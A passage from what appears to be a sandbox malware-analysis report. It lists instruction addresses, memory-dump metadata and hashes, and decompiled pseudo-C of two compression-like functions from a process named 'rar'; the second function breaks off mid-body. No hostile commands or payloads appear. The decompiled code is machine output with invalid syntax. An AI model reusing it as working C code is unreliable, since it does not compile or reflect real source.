                                                                                                            0x7ff650b21142
                                                                                                            0x7ff650b21148
                                                                                                            0x7ff650b2114b
                                                                                                            0x7ff650b2114e
                                                                                                            0x7ff650b21153
                                                                                                            0x7ff650b21159
                                                                                                            0x7ff650b2115d
                                                                                                            0x7ff650b21160
                                                                                                            0x7ff650b21167
                                                                                                            0x7ff650b21169
                                                                                                            0x7ff650b2116d
                                                                                                            0x7ff650b2117c
                                                                                                            0x7ff650b2117f
                                                                                                            0x7ff650b21184
                                                                                                            0x7ff650b2118c
                                                                                                            0x7ff650b2118e
                                                                                                            0x7ff650b21191
                                                                                                            0x7ff650b21195
                                                                                                            0x7ff650b21198
                                                                                                            0x7ff650b2119b
                                                                                                            0x7ff650b2119f
                                                                                                            0x7ff650b211a7
                                                                                                            0x7ff650b211ae
                                                                                                            0x7ff650b211b0
                                                                                                            0x7ff650b211c6
                                                                                                            0x7ff650b211c8
                                                                                                            0x7ff650b211d0
                                                                                                            0x7ff650b211d8
                                                                                                            0x7ff650b211de
                                                                                                            0x7ff650b211e0
                                                                                                            0x7ff650b211e4
                                                                                                            0x7ff650b211e7
                                                                                                            0x7ff650b211ea
                                                                                                            0x7ff650b211ec
                                                                                                            0x7ff650b211f3
                                                                                                            0x7ff650b211fe
                                                                                                            0x7ff650b21201
                                                                                                            0x7ff650b21206
                                                                                                            0x7ff650b21214
                                                                                                            0x7ff650b21217
                                                                                                            0x7ff650b2121a
                                                                                                            0x7ff650b2121d
                                                                                                            0x7ff650b21224
                                                                                                            0x7ff650b21230
                                                                                                            0x7ff650b21236
                                                                                                            0x7ff650b2123a
                                                                                                            0x7ff650b2123e
                                                                                                            0x7ff650b21244
                                                                                                            0x7ff650b21247
                                                                                                            0x7ff650b2124a
                                                                                                            0x7ff650b2124d
                                                                                                            0x7ff650b21251
                                                                                                            0x7ff650b21256
                                                                                                            0x7ff650b2125a
                                                                                                            0x7ff650b2125f
                                                                                                            0x7ff650b21262
                                                                                                            0x7ff650b21265
                                                                                                            0x7ff650b21267
                                                                                                            0x7ff650b21276
                                                                                                            0x7ff650b21279
                                                                                                            0x7ff650b21288
                                                                                                            0x7ff650b2128d
                                                                                                            0x7ff650b21290
                                                                                                            0x7ff650b21293
                                                                                                            0x7ff650b21296
                                                                                                            0x7ff650b2129a
                                                                                                            0x7ff650b212ad
                                                                                                            0x7ff650b212b6
                                                                                                            0x7ff650b212b9
                                                                                                            0x7ff650b212bb
                                                                                                            0x7ff650b212cb
                                                                                                            0x7ff650b212ce
                                                                                                            0x7ff650b212dd
                                                                                                            0x7ff650b212df
                                                                                                            0x7ff650b212e2
                                                                                                            0x7ff650b212e6
                                                                                                            0x7ff650b212ed
                                                                                                            0x7ff650b212f5
                                                                                                            0x7ff650b212fb
                                                                                                            0x7ff650b212fe
                                                                                                            0x7ff650b21301
                                                                                                            0x7ff650b21306
                                                                                                            0x7ff650b21310
                                                                                                            0x7ff650b21314
                                                                                                            0x7ff650b21317
                                                                                                            0x7ff650b2131a
                                                                                                            0x7ff650b2131d
                                                                                                            0x7ff650b21322
                                                                                                            0x7ff650b21335
                                                                                                            0x7ff650b21338
                                                                                                            0x7ff650b21342
                                                                                                            0x7ff650b21344
                                                                                                            0x7ff650b21348
                                                                                                            0x7ff650b2134b
                                                                                                            0x7ff650b2134f
                                                                                                            0x7ff650b2135c
                                                                                                            0x7ff650b21363
                                                                                                            0x7ff650b21368
                                                                                                            0x7ff650b2136f
                                                                                                            0x7ff650b21378
                                                                                                            0x7ff650b2138c
                                                                                                            0x7ff650b21391
                                                                                                            0x7ff650b2139d
                                                                                                            0x7ff650b213a1
                                                                                                            0x7ff650b213a3
                                                                                                            0x7ff650b213b9
                                                                                                            0x7ff650b213c8
                                                                                                            0x7ff650b213d0
                                                                                                            0x7ff650b213d7
                                                                                                            0x7ff650b213e3
                                                                                                            0x7ff650b213eb
                                                                                                            0x7ff650b213f1
                                                                                                            0x7ff650b213f4
                                                                                                            0x7ff650b213f7
                                                                                                            0x7ff650b213fc
                                                                                                            0x7ff650b21403
                                                                                                            0x7ff650b21409
                                                                                                            0x7ff650b2140c
                                                                                                            0x7ff650b21418
                                                                                                            0x7ff650b21422
                                                                                                            0x7ff650b21427
                                                                                                            0x7ff650b2142c
                                                                                                            0x7ff650b2142f
                                                                                                            0x7ff650b2143b
                                                                                                            0x7ff650b21445
                                                                                                            0x7ff650b21451
                                                                                                            0x7ff650b21456
                                                                                                            0x7ff650b2145d
                                                                                                            0x7ff650b21464
                                                                                                            0x7ff650b2146a
                                                                                                            0x7ff650b2146d
                                                                                                            0x7ff650b21479
                                                                                                            0x7ff650b21483
                                                                                                            0x7ff650b21488
                                                                                                            0x7ff650b2148d
                                                                                                            0x7ff650b21490
                                                                                                            0x7ff650b21495
                                                                                                            0x7ff650b21499
                                                                                                            0x7ff650b214a6
                                                                                                            0x7ff650b214ad
                                                                                                            0x7ff650b214b2
                                                                                                            0x7ff650b214b6
                                                                                                            0x7ff650b214ba
                                                                                                            0x7ff650b214bf
                                                                                                            0x7ff650b214c9
                                                                                                            0x7ff650b214cd
                                                                                                            0x7ff650b214d5
                                                                                                            0x7ff650b214dd
                                                                                                            0x7ff650b214ed
                                                                                                            0x7ff650b21503

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 31117fdf6d323f15267c8ed4589f3b045437bac1f915fffd73fa2e8e7b1d855b
                                                                                                            • Instruction ID: 8f9a37fe80d47b5a6e77c0b1d56739461691d67263e376a55af7a47d611d2656
                                                                                                            • Opcode Fuzzy Hash: 31117fdf6d323f15267c8ed4589f3b045437bac1f915fffd73fa2e8e7b1d855b
                                                                                                            • Instruction Fuzzy Hash: 85E1F273E041A39BE718CE2589841BC7BA2F796B44F098535DE5BB3788DE3AD944C780
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B40528 Relevance: .3, Instructions: 332COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E00007FF67FF650B40528(signed int __rbx, long long __rcx, long long __rdx, long long __r8) {
				void* __rsi;
				void* __rbp;
				void* _t125;
				signed int _t132;
				signed int _t143;
				signed int _t145;
				signed int _t150;
				void* _t151;
				intOrPtr _t159;
				signed int _t162;
				signed int _t183;
				void* _t185;
				signed int _t186;
				void* _t188;
				signed int _t189;
				void* _t225;
				signed long long _t247;
				signed long long _t254;
				signed long long _t258;
				intOrPtr* _t260;
				signed long long _t269;
				signed long long _t273;
				signed long long _t274;
				signed long long _t276;
				void* _t280;
				intOrPtr _t288;
				void* _t289;
				void* _t295;
				signed int _t298;
				void* _t300;
				signed long long _t301;
				signed int _t307;
				signed long long _t309;
				void* _t315;
				signed int* _t326;
				void* _t329;

				_t268 = __rbx;
				 *((long long*)(_t300 + 8)) = __rbx;
				_push(_t295);
				_push(_t329);
				_t298 = _t300 - 0x420;
				_t301 = _t300 - 0x520;
				_t247 =  *0x50b978f0; // 0x27db226282f1
				 *(_t298 + 0x410) = _t247 ^ _t301;
				r14d = 8;
				_t326 =  *((intOrPtr*)(_t298 + 0x480));
				 *((long long*)(_t301 + 0x58)) = __r8;
				r15d = r9d;
				 *((long long*)(_t301 + 0x50)) = __rdx;
				 *((long long*)(_t301 + 0x38)) =  *((intOrPtr*)(_t298 + 0x488));
				 *(_t301 + 0x30) = r14d;
				 *(_t301 + 0x44) = r9d;
				 *((long long*)(_t301 + 0x48)) = __rcx;
				_t309 =  *0x50b96eb0;
				if ( *((intOrPtr*)(__rcx + 0x20 + (_t309 + _t309 * 2) * 4)) == 2) goto 0x50b405b3;
				if (1 - 3 < 0) goto 0x50b40598;
				goto 0x50b405d6;
				 *(_t301 + 0x30) = r9d;
				r14d = r9d;
				if (r9d != 5) goto 0x50b405c7;
				goto 0x50b405d6;
				asm("sbb ebx, ebx");
				_t150 = _t309 - 0x00000002 &  *(__rcx + 0x24 + (_t309 + _t309 * 2) * 4);
				asm("cdq");
				_t188 =  <  ? r15d + 1 >> 8 : 0x101;
				r9d = 0;
				 *((long long*)(_t301 + 0x60)) = 0x101;
				if (_t150 != 0) goto 0x50b4067f;
				_t288 =  *((intOrPtr*)(_t301 + 0x50));
				r9d = r15d;
				 *((intOrPtr*)(_t301 + 0x28)) = 0x101;
				 *(_t301 + 0x20) = _t298;
				_t125 = E00007FF67FF650B40C08(1, _t188, __rcx, _t288,  *((intOrPtr*)(_t301 + 0x58)));
				_t273 = _t301 + 0x70;
				r8d = 0x84;
				E00007FF67FF650B6C1A0(_t125, 0, _t273, _t288,  *((intOrPtr*)(_t301 + 0x58)));
				if (0x101 <= 0) goto 0x50b40648;
				_t274 = _t273 + 1;
				 *((intOrPtr*)(_t301 + 0x70 +  *(_t298 + _t273 * 4) * 4)) =  *((intOrPtr*)(_t301 + 0x70 +  *(_t298 + _t273 * 4) * 4)) + 1;
				if (_t274 - 0x101 < 0) goto 0x50b40637;
				r9d =  *(_t301 + 0x74);
				r8d = 2;
				_t155 =  <=  ? 1 : r8d;
				r9d = r9d +  *((intOrPtr*)(_t301 + 0x78));
				r8d = r8d + 1;
				_t182 =  <=  ? 1 : r8d;
				if (r8d - 0x21 < 0) goto 0x50b40658;
				if (r14d == 8) goto 0x50b406ab;
				_t48 = _t268 - 1; // 0x1f
				if (_t48 - 0x1e > 0) goto 0x50b406ab;
				_t326[1] = _t326[1] & 0x00000000;
				_t326[2] = r15d;
				 *_t326 = r14d;
				_t183 =  !=  ? _t150 :  <=  ? 1 : r8d;
				_t326[3] = _t183;
				 *((intOrPtr*)( *((intOrPtr*)(_t301 + 0x38)))) =  *((intOrPtr*)( *((intOrPtr*)(_t301 + 0x38)))) + 1;
				goto 0x50b40968;
				_t254 = _t183;
				if (_t254 - 0x21 >= 0) goto 0x50b406d4;
				_t307 = _t254 * 4;
				if (_t183 + _t183 - 0x21 < 0) goto 0x50b406c8;
				r14d = 0x10;
				if (r9d - r14d <= 0) goto 0x50b407c2;
				if (_t288 + _t288 - r9d <= 0) goto 0x50b407c2;
				r8d = 0;
				if (_t188 <= 0) goto 0x50b40752;
				r10d =  *(_t298 + _t274 * 4);
				if (r10d - 4 <= 0) goto 0x50b40747;
				asm("cdq");
				if (r10d % _t183 != 0) goto 0x50b40747;
				r9d = 0;
				_t258 = r8d;
				if (_t258 - 0x101 >= 0) goto 0x50b40743;
				if ( *((intOrPtr*)(_t298 + _t258 * 4)) != r10d) goto 0x50b4072f;
				r9d = r9d + 1;
				_t289 = _t288 + 1;
				if (_t258 + 1 - 0x101 < 0) goto 0x50b4071a;
				if (_t289 - 8 < 0) goto 0x50b40743;
				r8d = r8d - 1;
				r8d = r8d + r9d;
				_t276 = _t274 - 1 + _t289;
				goto 0x50b40747;
				 *(_t298 + _t276 * 4) = _t183;
				r8d = r8d + 1;
				if (_t276 + 1 - 0x101 < 0) goto 0x50b406f8;
				_t66 = _t295 - 0x10; // 0x0
				_t151 = _t66;
				if (_t151 <= 0) goto 0x50b407c2;
				r9d = 0;
				_t315 = _t329;
				r8d = 0;
				if (_t309 - _t315 >= 0) goto 0x50b407b1;
				_t69 = _t307 + 1; // 0x1
				_t132 =  !=  ? r8d : _t69;
				r8d = _t132;
				if (_t309 + 1 - _t315 < 0) goto 0x50b40770;
				if (_t132 == r14d) goto 0x50b407b1;
				if (_t132 - 0xc < 0) goto 0x50b407b1;
				_t70 = _t289 + 0x10; // 0x10
				if (0 - _t70 >= 0) goto 0x50b407b1;
				asm("movd xmm0, edi");
				asm("pshufd xmm0, xmm0, 0x0");
				asm("movups [ecx], xmm0");
				asm("movups [ecx+0x10], xmm0");
				asm("movups [ecx+0x20], xmm0");
				asm("movups [ecx+0x30], xmm0");
				if (0 + r14d - _t151 < 0) goto 0x50b40765;
				_t71 = _t295 - 2; // 0xe
				_t280 = _t71;
				if (_t280 - 2 <= 0) goto 0x50b407ef;
				_t260 = _t298 + 4;
				_t73 = _t280 - 2; // -65
				_t159 =  *((intOrPtr*)(_t260 - 4));
				if (_t159 !=  *_t260) goto 0x50b407e5;
				_t225 = _t159 -  *((intOrPtr*)(_t260 + 8));
				if (_t225 != 0) goto 0x50b407e5;
				 *((intOrPtr*)(_t260 + 4)) = _t159;
				if (_t225 != 0) goto 0x50b407d6;
				r15d = 0;
				if ( *((intOrPtr*)(_t301 + 0x38)) -  *((intOrPtr*)(_t298 + 0x490)) >= 0) goto 0x50b40968;
				goto 0x50b40817;
				if ( *((intOrPtr*)(_t298 + __rbx * 4)) != 0) goto 0x50b4081c;
				r15d = r15d + 1;
				_t269 = __rbx + 1;
				if (_t269 - 0x101 < 0) goto 0x50b4080a;
				_t189 =  *(_t298 + _t269 * 4);
				r10d = 0;
				r14d = 0;
				 *(_t301 + 0x40) = r15d << 8;
				if (_t269 - 0x101 >= 0) goto 0x50b40868;
				if ( *(_t298 + _t269 * 4) != _t189) goto 0x50b40864;
				r14d = r14d + 1;
				r14d =  <  ? r14d : r14d;
				r10d = r10d +  *((intOrPtr*)( *((intOrPtr*)(_t301 + 0x50)) + 0x418 + _t269 * 4));
				r15d = r15d + 1;
				if (_t269 + 1 - 0x101 < 0) goto 0x50b4083a;
				_t162 =  *(_t301 + 0x40);
				_t185 =  <  ? r15d << 8 :  *(_t301 + 0x44);
				if (_t162 - _t185 >= 0) goto 0x50b40968;
				_t186 = _t185 - _t162;
				_t326[1] = _t162;
				_t326[2] = _t186;
				_t326[3] = _t189;
				if (_t186 - 0x200 <= 0) goto 0x50b40954;
				if (_t189 != 1) goto 0x50b408aa;
				if (_t186 - 0x400 <= 0) goto 0x50b40954;
				asm("cdq");
				if (_t186 / _t189 - 0x80 <= 0) goto 0x50b40954;
				r9d = _t186;
				 *(_t301 + 0x20) = _t189;
				if (E00007FF67FF650B39EF8(r10d, _t269 + 1, _t73 - 1, _t295, _t298, _t162 +  *((intOrPtr*)(_t301 + 0x58))) == 0) goto 0x50b4094f;
				if ( *(_t301 + 0x30) != 8) goto 0x50b4091f;
				r9d = _t189;
				r8d = _t186;
				_t143 = E00007FF67FF650B409C4(_t269 + 1, _t162 +  *((intOrPtr*)(_t301 + 0x58)), _t315 + _t329);
				 *_t326 = _t143;
				if (_t143 != 5) goto 0x50b40925;
				if (r14d <= 0) goto 0x50b40925;
				asm("cdq");
				_t145 = _t186 / r14d;
				if (_t145 - 0x4000 >= 0) goto 0x50b40925;
				 *_t326 =  *_t326 & 0x00000000;
				goto 0x50b40925;
				 *_t326 = _t145;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t301 + 0x48)) + 0x20 + (_t145 + _t145 * 2) * 4)) == 3) goto 0x50b40943;
				 *((intOrPtr*)( *((intOrPtr*)(_t301 + 0x38)))) =  *((intOrPtr*)( *((intOrPtr*)(_t301 + 0x38)))) + 1;
				 *((char*)( *((intOrPtr*)(_t301 + 0x50)) + 0x82c)) = 1;
				if ( *((intOrPtr*)(_t301 + 0x38)) -  *((intOrPtr*)(_t298 + 0x490)) < 0) goto 0x50b40817;
				return E00007FF67FF650B69D10( *((intOrPtr*)( *((intOrPtr*)(_t301 + 0x38)))), _t145,  *(_t298 + 0x410) ^ _t301);
			}







































                                                                                                            0x7ff650b40528
                                                                                                            0x7ff650b40528
                                                                                                            0x7ff650b4052e
                                                                                                            0x7ff650b40534
                                                                                                            0x7ff650b40538
                                                                                                            0x7ff650b40540
                                                                                                            0x7ff650b40547
                                                                                                            0x7ff650b40551
                                                                                                            0x7ff650b4055f
                                                                                                            0x7ff650b40565
                                                                                                            0x7ff650b4056e
                                                                                                            0x7ff650b40573
                                                                                                            0x7ff650b40576
                                                                                                            0x7ff650b40582
                                                                                                            0x7ff650b40589
                                                                                                            0x7ff650b4058e
                                                                                                            0x7ff650b40593
                                                                                                            0x7ff650b40598
                                                                                                            0x7ff650b405a4
                                                                                                            0x7ff650b405af
                                                                                                            0x7ff650b405b1
                                                                                                            0x7ff650b405b3
                                                                                                            0x7ff650b405b8
                                                                                                            0x7ff650b405bf
                                                                                                            0x7ff650b405c5
                                                                                                            0x7ff650b405d0
                                                                                                            0x7ff650b405d2
                                                                                                            0x7ff650b405de
                                                                                                            0x7ff650b405ee
                                                                                                            0x7ff650b405f1
                                                                                                            0x7ff650b405f7
                                                                                                            0x7ff650b405fe
                                                                                                            0x7ff650b40609
                                                                                                            0x7ff650b4060e
                                                                                                            0x7ff650b40611
                                                                                                            0x7ff650b40615
                                                                                                            0x7ff650b4061a
                                                                                                            0x7ff650b40621
                                                                                                            0x7ff650b40626
                                                                                                            0x7ff650b4062c
                                                                                                            0x7ff650b40633
                                                                                                            0x7ff650b4063c
                                                                                                            0x7ff650b4063f
                                                                                                            0x7ff650b40646
                                                                                                            0x7ff650b40648
                                                                                                            0x7ff650b40652
                                                                                                            0x7ff650b40669
                                                                                                            0x7ff650b4066c
                                                                                                            0x7ff650b4066f
                                                                                                            0x7ff650b40672
                                                                                                            0x7ff650b40678
                                                                                                            0x7ff650b40683
                                                                                                            0x7ff650b40685
                                                                                                            0x7ff650b4068b
                                                                                                            0x7ff650b4068d
                                                                                                            0x7ff650b40694
                                                                                                            0x7ff650b40698
                                                                                                            0x7ff650b4069c
                                                                                                            0x7ff650b4069f
                                                                                                            0x7ff650b406a3
                                                                                                            0x7ff650b406a6
                                                                                                            0x7ff650b406ad
                                                                                                            0x7ff650b406b6
                                                                                                            0x7ff650b406b8
                                                                                                            0x7ff650b406d2
                                                                                                            0x7ff650b406d4
                                                                                                            0x7ff650b406dd
                                                                                                            0x7ff650b406e9
                                                                                                            0x7ff650b406ef
                                                                                                            0x7ff650b406f4
                                                                                                            0x7ff650b406f8
                                                                                                            0x7ff650b40701
                                                                                                            0x7ff650b40706
                                                                                                            0x7ff650b4070b
                                                                                                            0x7ff650b4070d
                                                                                                            0x7ff650b40710
                                                                                                            0x7ff650b40718
                                                                                                            0x7ff650b4071f
                                                                                                            0x7ff650b40721
                                                                                                            0x7ff650b40724
                                                                                                            0x7ff650b4072d
                                                                                                            0x7ff650b40733
                                                                                                            0x7ff650b40735
                                                                                                            0x7ff650b4073b
                                                                                                            0x7ff650b4073e
                                                                                                            0x7ff650b40741
                                                                                                            0x7ff650b40743
                                                                                                            0x7ff650b40747
                                                                                                            0x7ff650b40750
                                                                                                            0x7ff650b40752
                                                                                                            0x7ff650b40752
                                                                                                            0x7ff650b40759
                                                                                                            0x7ff650b4075b
                                                                                                            0x7ff650b40762
                                                                                                            0x7ff650b40765
                                                                                                            0x7ff650b4076e
                                                                                                            0x7ff650b40775
                                                                                                            0x7ff650b40779
                                                                                                            0x7ff650b40780
                                                                                                            0x7ff650b40786
                                                                                                            0x7ff650b4078b
                                                                                                            0x7ff650b40790
                                                                                                            0x7ff650b40792
                                                                                                            0x7ff650b40797
                                                                                                            0x7ff650b40799
                                                                                                            0x7ff650b4079d
                                                                                                            0x7ff650b407a2
                                                                                                            0x7ff650b407a5
                                                                                                            0x7ff650b407a9
                                                                                                            0x7ff650b407ad
                                                                                                            0x7ff650b407c0
                                                                                                            0x7ff650b407c2
                                                                                                            0x7ff650b407c5
                                                                                                            0x7ff650b407cc
                                                                                                            0x7ff650b407ce
                                                                                                            0x7ff650b407d2
                                                                                                            0x7ff650b407d6
                                                                                                            0x7ff650b407db
                                                                                                            0x7ff650b407dd
                                                                                                            0x7ff650b407e0
                                                                                                            0x7ff650b407e2
                                                                                                            0x7ff650b407ed
                                                                                                            0x7ff650b407f4
                                                                                                            0x7ff650b40800
                                                                                                            0x7ff650b40808
                                                                                                            0x7ff650b4080f
                                                                                                            0x7ff650b40811
                                                                                                            0x7ff650b40814
                                                                                                            0x7ff650b4081a
                                                                                                            0x7ff650b4081c
                                                                                                            0x7ff650b40826
                                                                                                            0x7ff650b40829
                                                                                                            0x7ff650b4082c
                                                                                                            0x7ff650b40833
                                                                                                            0x7ff650b40841
                                                                                                            0x7ff650b4084a
                                                                                                            0x7ff650b40852
                                                                                                            0x7ff650b40856
                                                                                                            0x7ff650b40859
                                                                                                            0x7ff650b40862
                                                                                                            0x7ff650b40864
                                                                                                            0x7ff650b40874
                                                                                                            0x7ff650b40879
                                                                                                            0x7ff650b4087f
                                                                                                            0x7ff650b40881
                                                                                                            0x7ff650b40885
                                                                                                            0x7ff650b40889
                                                                                                            0x7ff650b40893
                                                                                                            0x7ff650b4089c
                                                                                                            0x7ff650b408a4
                                                                                                            0x7ff650b408ac
                                                                                                            0x7ff650b408b4
                                                                                                            0x7ff650b408bd
                                                                                                            0x7ff650b408d0
                                                                                                            0x7ff650b408db
                                                                                                            0x7ff650b408e4
                                                                                                            0x7ff650b408eb
                                                                                                            0x7ff650b408ee
                                                                                                            0x7ff650b408f4
                                                                                                            0x7ff650b408f9
                                                                                                            0x7ff650b40902
                                                                                                            0x7ff650b40907
                                                                                                            0x7ff650b4090b
                                                                                                            0x7ff650b4090c
                                                                                                            0x7ff650b40914
                                                                                                            0x7ff650b40916
                                                                                                            0x7ff650b4091d
                                                                                                            0x7ff650b4091f
                                                                                                            0x7ff650b40936
                                                                                                            0x7ff650b4093d
                                                                                                            0x7ff650b40948
                                                                                                            0x7ff650b40962
                                                                                                            0x7ff650b40991

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5d19f2051ecb1982cb0b2bb3c0c23537277a45b153b5b502d2f248709dca426c
                                                                                                            • Instruction ID: c30e6627b2ab20dcf09e3d8d01447f14dd39155f5145631481733197f468ce09
                                                                                                            • Opcode Fuzzy Hash: 5d19f2051ecb1982cb0b2bb3c0c23537277a45b153b5b502d2f248709dca426c
                                                                                                            • Instruction Fuzzy Hash: 32D1D532A18296A6E750CF18E4C067D77A2FB96744F558135DA8FA3B45CF3EEA41CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B4F2F0 Relevance: .3, Instructions: 327COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 66%
                                                                                                            			E00007FF67FF650B4F2F0(void* __eflags, signed long long __rax, intOrPtr* __rcx, void* __r11) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r13;
				void* __r15;
				intOrPtr _t149;
				void* _t150;
				intOrPtr _t153;
				void* _t167;
				signed int _t173;
				intOrPtr _t183;
				signed int _t185;
				signed long long _t196;
				void* _t208;
				void* _t209;
				void* _t243;
				signed long long _t261;
				signed long long _t262;
				intOrPtr _t266;
				intOrPtr _t269;
				intOrPtr _t271;
				signed long long _t272;
				long long _t275;
				long long _t276;
				intOrPtr* _t329;
				void* _t330;
				signed long long _t331;
				signed long long _t336;
				void* _t338;
				void* _t339;
				char* _t346;
				intOrPtr _t349;
				signed long long _t356;
				void* _t357;
				long long _t358;
				long long _t359;
				void* _t361;
				void* _t362;
				long long _t363;
				signed long long _t366;
				void* _t368;
				long long _t369;
				void* _t370;
				signed long long _t371;

				_t357 = __r11;
				_t261 = __rax;
				_t329 = __rcx;
				r8d = 0x20;
				E00007FF67FF650B6EEC0(_t272,  *((intOrPtr*)(__rcx + 0x80)),  *((intOrPtr*)(__rcx + 0x88)), __rcx, _t330, _t339, E00007FF67FF650B50A00, _t361, _t370);
				E00007FF67FF650B69B9C( *((intOrPtr*)(__rcx + 0x88)), E00007FF67FF650B50A00);
				 *(_t338 + 0xc8) = _t261;
				_t371 = _t261;
				E00007FF67FF650B111C0(0x67,  *((intOrPtr*)(_t329 + 8)) + 0x3a);
				E00007FF67FF650B52FB8(_t173, _t272,  *_t329,  *((intOrPtr*)(_t329 + 8)) + 0x3a, 0x7fffffff);
				r12d = 0;
				r14d = 0;
				 *((long long*)(_t338 + 0x38)) = _t358;
				 *((long long*)(_t338 + 0x30)) = _t363;
				r13d = 0;
				 *((char*)(_t338 + 0xb0)) = 0;
				_t9 = _t331 + 1; // 0x1
				_t209 = _t9;
				 *(_t338 + 0xc0) = _t331;
				if ( *(_t329 + 0x140) - _t331 <= 0) goto 0x50b4f6ff;
				E00007FF67FF650B5B008();
				E00007FF67FF650B52FB8(0, _t272,  *_t329, _t331,  *(_t329 + 0x140));
				E00007FF67FF650B512F8(0, 0, _t272, _t329, _t331, _t330);
				r9d =  *((intOrPtr*)(_t329 + 0x12c));
				if (r9d == 0) goto 0x50b4f3ee;
				r8d =  *((intOrPtr*)(_t329 + 0x128));
				if ( *((char*)( *((intOrPtr*)(_t329 + 0x78)) + (_t261 + _t261 * 2 + _t261 + _t261 * 2) * 8)) != 0) goto 0x50b4f3fd;
				_t196 = r8d + _t209;
				if (_t196 - r8d - r9d < 0) goto 0x50b4f3d2;
				 *((char*)(_t338 + 0xb0)) = sil;
				goto 0x50b4f6cc;
				if (_t196 == 0xffffffff) goto 0x50b4f3ee;
				_t262 = _t196;
				_t149 = E00007FF67FF650B50EDC(_t272, _t329,  *((intOrPtr*)( *((intOrPtr*)(_t329 + 0x78)) + 8 + (_t262 + _t262 * 2 + _t262 + _t262 * 2) * 8)), _t330);
				r9d = 0;
				 *((intOrPtr*)(_t338 + 0xb8)) = _t149;
				if ( *((intOrPtr*)(_t329 + 0x130)) - r9d <= 0) goto 0x50b4f44c;
				 *((char*)(E00007FF67FF650B50A00 + _t371)) =  *((intOrPtr*)( *((intOrPtr*)(_t329 + 0x78)) + (E00007FF67FF650B50A00 + E00007FF67FF650B50A00 * 2 + E00007FF67FF650B50A00 + E00007FF67FF650B50A00 * 2) * 8));
				r9d = r9d + _t209;
				if (r9d -  *((intOrPtr*)(_t329 + 0x130)) < 0) goto 0x50b4f42e;
				r8d =  *((intOrPtr*)(_t329 + 0x12c));
				_t150 = E00007FF67FF650B55FF8(_t149,  *((intOrPtr*)(_t329 + 0x128)), _t262, _t272, _t329 + 0x10, E00007FF67FF650B50A00 + E00007FF67FF650B50A00 * 2 + E00007FF67FF650B50A00 + E00007FF67FF650B50A00 * 2,  *(_t329 + 0x140),  *(_t338 + 0xc8));
				if (_t149 == 0) goto 0x50b4f5a9;
				if (_t150 == 0) goto 0x50b4f5a9;
				if ( *((intOrPtr*)(_t329 + 0x128)) == 0) goto 0x50b4f4e6;
				_t349 =  *((intOrPtr*)(_t329 + 0x78));
				_t356 = _t331 * 2 + _t331 + _t331 * 2 + _t331;
				if ( *((char*)(_t349 + _t356 * 8)) != 0) goto 0x50b4f4d8;
				goto 0x50b4f4ad;
				if ( *((char*)(_t349 + (_t272 + _t272 * 2 + _t272 + _t272 * 2) * 8)) == 0) goto 0x50b4f4a7;
				r8d =  *((intOrPtr*)(_t329 + 0x150));
				E00007FF67FF650B6BAF0();
				_t153 =  *((intOrPtr*)(_t329 + 0x128));
